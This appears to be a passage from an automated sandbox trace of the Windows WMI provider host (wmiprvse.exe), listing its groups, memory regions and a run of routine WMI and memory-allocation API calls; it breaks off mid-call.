os_parent_pid = "0x254" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d99f" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 2557 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2558 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2559 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2560 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2561 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2562 start_va = 0xc0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 2563 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2564 start_va = 0x1d0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2565 start_va = 0x1e0000 end_va = 0x1e4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 2566 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 2567 start_va = 0x200000 end_va = 0x200fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 2568 start_va = 0x210000 end_va = 0x210fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 2569 start_va = 0x220000 end_va = 0x29ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 2570 start_va = 0x2a0000 end_va = 0x427fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2571 start_va = 0x460000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 2572 start_va = 0x560000 end_va = 0x6e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 2573 start_va = 0x6f0000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 2574 start_va = 0x7b0000 end_va = 0xa7efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2575 start_va = 0xad0000 end_va = 0xb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 2576 start_va = 0xbb0000 end_va = 0xc2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bb0000" filename = "" Region: id = 2577 start_va = 0xc40000 end_va = 0xcbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c40000" filename = "" Region: id = 2578 start_va = 0xcc0000 end_va = 0xd3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 2579 start_va = 0xe30000 end_va = 0xeaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 2580 start_va = 0xee0000 end_va = 0xf5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 2581 start_va = 0xfa0000 end_va = 0x101ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 2582 start_va = 0x1020000 end_va = 0x111ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2583 start_va = 0x1120000 end_va = 0x119ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 2584 start_va = 0x1340000 end_va = 0x13bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001340000" filename = "" Region: id = 2585 start_va = 0x77610000 end_va = 0x77709fff monitored = 0 entry_point = 0x7762a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2586 start_va = 0x77710000 end_va = 0x7782efff monitored = 0 entry_point = 0x77725340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2587 start_va = 0x77830000 end_va = 0x779d8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2588 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2589 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2590 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2591 start_va = 0x13f7d0000 end_va = 0x13f83bfff monitored = 0 entry_point = 0x13f80b450 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 2592 start_va = 0x7fef28e0000 end_va = 0x7fef292dfff monitored = 0 entry_point = 0x7fef28e1198 region_type = mapped_file name = "pdh.dll" filename = "\\Windows\\System32\\pdh.dll" (normalized: "c:\\windows\\system32\\pdh.dll") Region: id = 2593 start_va = 0x7fef2930000 end_va = 0x7fef2954fff monitored = 1 entry_point = 0x7fef2948d6c region_type = mapped_file name = "wmiperfclass.dll" filename = "\\Windows\\System32\\wbem\\WmiPerfClass.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiperfclass.dll") Region: id = 2594 start_va = 0x7fef6d60000 end_va = 0x7fef6de5fff monitored = 1 entry_point = 0x7fef6d6ffd0 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 2595 start_va = 0x7fef6df0000 end_va = 0x7fef6e2bfff monitored = 1 entry_point = 0x7fef6e15aa8 region_type = mapped_file name = "wmiprov.dll" filename = "\\Windows\\System32\\wbem\\wmiprov.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprov.dll") Region: id = 2596 start_va = 0x7fef95c0000 end_va = 0x7fef95d1fff monitored = 0 entry_point = 0x7fef95c89d0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 2597 start_va = 0x7fef9780000 end_va = 0x7fef97a0fff monitored = 0 entry_point = 0x7fef97903b0 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 2598 start_va = 0x7fef98a0000 end_va = 0x7fef98b2fff monitored = 0 entry_point = 0x7fef98a1d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 2599 start_va = 0x7fef9b80000 end_va = 0x7fef9b8dfff monitored = 0 entry_point = 0x7fef9b85500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2600 start_va = 0x7fef9b90000 end_va = 0x7fef9bb6fff monitored = 0 entry_point = 0x7fef9b911a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 2601 start_va = 0x7fef9bc0000 end_va = 0x7fef9c92fff monitored = 0 entry_point = 0x7fef9c38b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 2602 start_va = 0x7fef9e20000 end_va = 0x7fef9e96fff monitored = 1 entry_point = 0x7fef9e5e7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 2603 start_va = 0x7fefb800000 end_va = 0x7fefb82cfff monitored = 0 entry_point = 0x7fefb801010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2604 start_va = 0x7fefcd70000 end_va = 0x7fefcdb6fff monitored = 0 entry_point = 0x7fefcd71064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2605 start_va = 0x7fefd070000 end_va = 0x7fefd087fff monitored = 0 entry_point = 0x7fefd073b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2606 start_va = 0x7fefd1e0000 end_va = 0x7fefd201fff monitored = 0 entry_point = 0x7fefd1e5d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2607 start_va = 0x7fefd2a0000 end_va = 0x7fefd30cfff monitored = 0 entry_point = 0x7fefd2a1010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 2608 start_va = 0x7fefd670000 end_va = 0x7fefd67efff monitored = 0 entry_point = 0x7fefd671010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2609 start_va = 0x7fefd760000 end_va = 0x7fefd773fff monitored = 0 entry_point = 0x7fefd7610e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2610 start_va = 0x7fefd910000 end_va = 0x7fefd97bfff monitored = 0 entry_point = 0x7fefd912780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2611 start_va = 0x7fefdb50000 end_va = 0x7fefdc7cfff monitored = 0 entry_point = 0x7fefdb9ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2612 start_va = 0x7fefdf90000 end_va = 0x7fefe066fff monitored = 0 entry_point = 0x7fefdf93274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2613 start_va = 0x7fefee80000 end_va = 0x7fefee9efff monitored = 0 entry_point = 0x7fefee860e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2614 start_va = 0x7feff100000 end_va = 0x7feff19efff monitored = 0 entry_point = 0x7feff1025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2615 start_va = 0x7feff1c0000 end_va = 0x7feff226fff monitored = 0 entry_point = 0x7feff1cb03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2616 start_va = 0x7feff350000 end_va = 0x7feff35dfff monitored = 0 entry_point = 0x7feff351080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2617 start_va = 0x7feff360000 end_va = 0x7feff3f8fff monitored = 0 entry_point = 0x7feff361c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2618 start_va = 0x7feff400000 end_va = 0x7feff42dfff monitored = 0 entry_point = 0x7feff401010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2619 start_va = 0x7feff430000 end_va = 0x7feff50afff monitored = 0 entry_point = 0x7feff450760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2620 start_va = 0x7feff690000 end_va = 0x7feff758fff monitored = 0 entry_point = 0x7feff70a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2621 start_va = 0x7feff760000 end_va = 0x7feff962fff monitored = 0 entry_point = 0x7feff783330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2622 start_va = 0x7feff970000 end_va = 0x7feff9bcfff monitored = 0 entry_point = 0x7feff971070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2623 start_va = 0x7feff9c0000 end_va = 0x7feff9c7fff monitored = 0 entry_point = 0x7feff9c1504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2624 start_va = 0x7feff9d0000 end_va = 0x7feffad8fff monitored = 0 entry_point = 0x7feff9d1064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2625 start_va = 0x7feffae0000 end_va = 0x7feffb31fff monitored = 0 entry_point = 0x7feffae10d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 2626 start_va = 0x7feffb50000 end_va = 0x7feffb50fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2627 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 2628 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 2629 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2630 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 2631 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 2632 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 2633 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 2634 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 2635 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 2636 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Thread: id = 90 os_tid = 0xf74 [0153.587] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2 [0153.606] SetLastError (dwErrCode=0x0) [0153.606] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xeae8f8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xeae800 | out: pulNumLanguages=0xeae8f8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xeae800) returned 1 [0153.606] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x8) returned 0x49ba60 [0153.606] SetLastError (dwErrCode=0x0) [0153.606] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xeae8f8, pwszLanguagesBuffer=0x49ba60, pcchLanguagesBuffer=0xeae800 | out: pulNumLanguages=0xeae8f8, pwszLanguagesBuffer=0x49ba60, pcchLanguagesBuffer=0xeae800) returned 1 [0153.606] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x8) returned 0x49baf0 [0153.606] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x49ba60 | out: hHeap=0x460000) returned 1 [0153.606] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x14) returned 0x49b660 [0153.606] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x49b660, pulNumLanguages=0xeae8f8 | out: pulNumLanguages=0xeae8f8) returned 1 [0153.607] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x49b660 | out: hHeap=0x460000) returned 1 [0153.609] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0153.609] malloc (_Size=0x60) returned 0xdc8d0 [0153.609] malloc (_Size=0x28) returned 0xdf390 [0153.609] malloc (_Size=0x3e) returned 0xdfe00 [0153.612] ?Get@CWbemObject@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ2@Z () returned 0x0 [0153.612] ?AddRef@CWbemObject@@UEAAKXZ () returned 0x2 [0153.612] ?GetQualifierSet@CWbemClass@@UEAAJPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.612] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.613] ?Release@CClassQualifierSet@@UEAAKXZ () returned 0x1 [0153.613] ?Release@CWbemObject@@UEAAKXZ () returned 0x1 [0153.613] malloc (_Size=0x20e) returned 0xdfe50 [0153.613] CLSIDFromString (in: lpsz="{bdc67efa-e5e7-4777-b13c-621459657099}", pclsid=0xdc908 | out: pclsid=0xdc908*(Data1=0xbdc67efa, Data2=0xe5e7, Data3=0x4777, Data4=([0]=0xb1, [1]=0x3c, [2]=0x62, [3]=0x14, [4]=0x59, [5]=0x65, [6]=0x70, [7]=0x99))) returned 0x0 [0153.613] free (_Block=0xdfe50) [0153.613] malloc (_Size=0x20) returned 0xdf420 [0153.613] ?GetNames@CWbemObject@@UEAAJPEBGJPEAUtagVARIANT@@PEAPEAUtagSAFEARRAY@@@Z () returned 0x0 [0153.613] SafeArrayGetElemsize (psa=0x4dcbc0) returned 0x8 [0153.614] SafeArrayPutElement (psa=0x4dcbc0, rgIndices=0xeae540, pv=0x4db488) returned 0x0 [0153.614] SafeArrayPutElement (psa=0x4dcbc0, rgIndices=0xeae540, pv=0x4db458) returned 0x0 [0153.614] SafeArrayPutElement (psa=0x4dcbc0, rgIndices=0xeae540, pv=0x4dcc38) returned 0x0 [0153.614] SafeArrayPutElement (psa=0x4dcbc0, rgIndices=0xeae540, pv=0x4dcbf8) returned 0x0 [0153.614] SafeArrayPutElement (psa=0x4dcbc0, rgIndices=0xeae540, pv=0x4dcc38) returned 0x0 [0153.614] SafeArrayPutElement (psa=0x4dcbc0, rgIndices=0xeae540, pv=0x4db488) returned 0x0 [0153.614] SafeArrayPutElement (psa=0x4dcbc0, rgIndices=0xeae540, pv=0x4dcbf8) returned 0x0 [0153.614] SafeArrayPutElement (psa=0x4dcbc0, rgIndices=0xeae540, pv=0x4dcc38) returned 0x0 [0153.615] SafeArrayPutElement (psa=0x4dcbc0, rgIndices=0xeae540, pv=0x4dcbf8) returned 0x0 [0153.615] SafeArrayPutElement (psa=0x4dcbc0, rgIndices=0xeae540, pv=0x4db458) returned 0x0 [0153.615] SafeArrayPutElement (psa=0x4dcbc0, rgIndices=0xeae540, pv=0x4db488) returned 0x0 [0153.615] SafeArrayPutElement (psa=0x4dcbc0, rgIndices=0xeae540, pv=0x4dcc38) returned 0x0 [0153.615] SafeArrayPutElement (psa=0x4dcbc0, rgIndices=0xeae540, pv=0x4dcbf8) returned 0x0 [0153.615] SafeArrayPutElement (psa=0x4dcbc0, rgIndices=0xeae540, pv=0x4dcc38) returned 0x0 [0153.615] SafeArrayPutElement (psa=0x4dcbc0, rgIndices=0xeae540, pv=0x4b64c8) returned 0x0 [0153.615] SafeArrayPutElement (psa=0x4dcbc0, rgIndices=0xeae540, pv=0x4b6478) returned 0x0 [0153.615] SafeArrayPutElement (psa=0x4dcbc0, rgIndices=0xeae540, pv=0x4dcbf8) returned 0x0 [0153.616] SafeArrayPutElement (psa=0x4dcbc0, rgIndices=0xeae540, pv=0x4dcc38) returned 0x0 [0153.616] SafeArrayPutElement (psa=0x4dcbc0, rgIndices=0xeae540, pv=0x4dcbf8) returned 0x0 [0153.616] SafeArrayRedim (in: psa=0x4dcbc0, psaboundNew=0xeae558 | out: psa=0x4dcbc0) returned 0x0 [0153.616] SafeArrayCopy (in: psa=0x4dcbc0, ppsaOut=0xeae4a0 | out: ppsaOut=0xeae4a0) returned 0x0 [0153.617] GetProcAddress (hModule=0x7fefdf90000, lpProcName=0x14) returned 0x7fefdf99830 [0153.617] SafeArrayGetLBound (in: psa=0x4dcf00, nDim=0x1, plLbound=0xeae6b8 | out: plLbound=0xeae6b8) returned 0x0 [0153.617] GetProcAddress (hModule=0x7fefdf90000, lpProcName=0x13) returned 0x7fefdf982c0 [0153.617] SafeArrayGetUBound (in: psa=0x4dcf00, nDim=0x1, plUbound=0xeae6a0 | out: plUbound=0xeae6a0) returned 0x0 [0153.617] GetProcAddress (hModule=0x7fefdf90000, lpProcName=0x19) returned 0x7fefdf97860 [0153.617] SafeArrayGetElement (in: psa=0x4dcf00, rgIndices=0xeae4dc, pv=0xeae4f0 | out: pv=0xeae4f0) returned 0x0 [0153.617] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.617] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.618] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.618] SafeArrayGetElement (in: psa=0x4dcf00, rgIndices=0xeae4dc, pv=0xeae4f0 | out: pv=0xeae4f0) returned 0x0 [0153.618] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.618] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.618] memcpy (in: _Dst=0xeae460, _Src=0x4e194c, _Size=0x4 | out: _Dst=0xeae460) returned 0xeae460 [0153.618] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.618] malloc (_Size=0x28) returned 0xdf3c0 [0153.619] malloc (_Size=0x8) returned 0x1de600 [0153.619] SafeArrayGetElement (in: psa=0x4dcf00, rgIndices=0xeae4dc, pv=0xeae4f0 | out: pv=0xeae4f0) returned 0x0 [0153.619] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.619] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.619] memcpy (in: _Dst=0xeae460, _Src=0x4e19af, _Size=0x4 | out: _Dst=0xeae460) returned 0xeae460 [0153.619] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.619] malloc (_Size=0x28) returned 0xdf450 [0153.619] malloc (_Size=0x10) returned 0x1de700 [0153.619] memmove_s (in: _Destination=0x1de700, _DestinationSize=0x8, _Source=0x1de600, _SourceSize=0x8 | out: _Destination=0x1de700) returned 0x0 [0153.620] free (_Block=0x1de600) [0153.620] SafeArrayGetElement (in: psa=0x4dcf00, rgIndices=0xeae4dc, pv=0xeae4f0 | out: pv=0xeae4f0) returned 0x0 [0153.620] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.620] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.620] memcpy (in: _Dst=0xeae460, _Src=0x4e1a14, _Size=0x4 | out: _Dst=0xeae460) returned 0xeae460 [0153.620] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.620] malloc (_Size=0x28) returned 0xdf3f0 [0153.620] malloc (_Size=0x18) returned 0x1de600 [0153.620] memmove_s (in: _Destination=0x1de600, _DestinationSize=0x10, _Source=0x1de700, _SourceSize=0x10 | out: _Destination=0x1de600) returned 0x0 [0153.620] free (_Block=0x1de700) [0153.621] SafeArrayGetElement (in: psa=0x4dcf00, rgIndices=0xeae4dc, pv=0xeae4f0 | out: pv=0xeae4f0) returned 0x0 [0153.621] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.621] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.621] memcpy (in: _Dst=0xeae460, _Src=0x4e1a79, _Size=0x4 | out: _Dst=0xeae460) returned 0xeae460 [0153.621] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.621] malloc (_Size=0x28) returned 0xdf540 [0153.621] malloc (_Size=0x20) returned 0xdf4e0 [0153.621] memmove_s (in: _Destination=0xdf4e0, _DestinationSize=0x18, _Source=0x1de600, _SourceSize=0x18 | out: _Destination=0xdf4e0) returned 0x0 [0153.621] free (_Block=0x1de600) [0153.622] SafeArrayGetElement (in: psa=0x4dcf00, rgIndices=0xeae4dc, pv=0xeae4f0 | out: pv=0xeae4f0) returned 0x0 [0153.622] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.622] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.622] memcpy (in: _Dst=0xeae460, _Src=0x4e1ae5, _Size=0x4 | out: _Dst=0xeae460) returned 0xeae460 [0153.622] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.622] malloc (_Size=0x28) returned 0xdf4b0 [0153.622] malloc (_Size=0x30) returned 0xcff70 [0153.622] memmove_s (in: _Destination=0xcff70, _DestinationSize=0x20, _Source=0xdf4e0, 